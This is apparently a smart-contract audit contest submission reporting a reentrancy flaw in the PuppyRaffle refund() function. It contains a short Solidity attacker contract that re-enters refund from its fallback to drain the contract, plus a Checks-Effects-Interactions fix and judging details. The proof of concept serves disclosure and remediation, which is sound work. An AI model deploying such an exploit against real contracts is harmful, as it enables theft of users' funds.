Submission Details
Severity:
Reentrancy in Refund Function
Summary
There is a re-entrancy vulnerability in refund function, that can be used to drain the whole contract.
Vulnerability Details
Re-entrancy issue in refund function, if someone writes an attacker contract and register it as a player, then that contract can be used to re-enter as refund function sends the value to player leading to giving transaction flow control before the after effects.
Impact
Funds can be drained from contract
Tools Used
Manual Tests
Wrote a attacker contract and used that to drain the contract
contract Attacker {
PuppyRaffle private puppyRaffle
constructor (address _puppyRaffle) {
puppyRaffle = PuppyRaffle(_puppyRaffle);
}
function attack () public {
puppyRaffle.refund(puppyRaffle.getActivePlayerIndex(address(this)));
}
fallback () payable external {
if (address(puppyRaffle).balance != 0)
attack();
}
}
Recommendations
Use Checks-Effects-Interactions pattern in refund function
function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
players[playerIndex] = address(0);
payable(msg.sender).sendValue(entranceFee);
emit RaffleRefunded(playerAddress);
}
Updates
Lead Judging Commences
Hamiltonite almost 2 years ago
Submission Judgement Published Assigned finding tags:
reentrancy-in-refund
reentrancy in refund() function
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.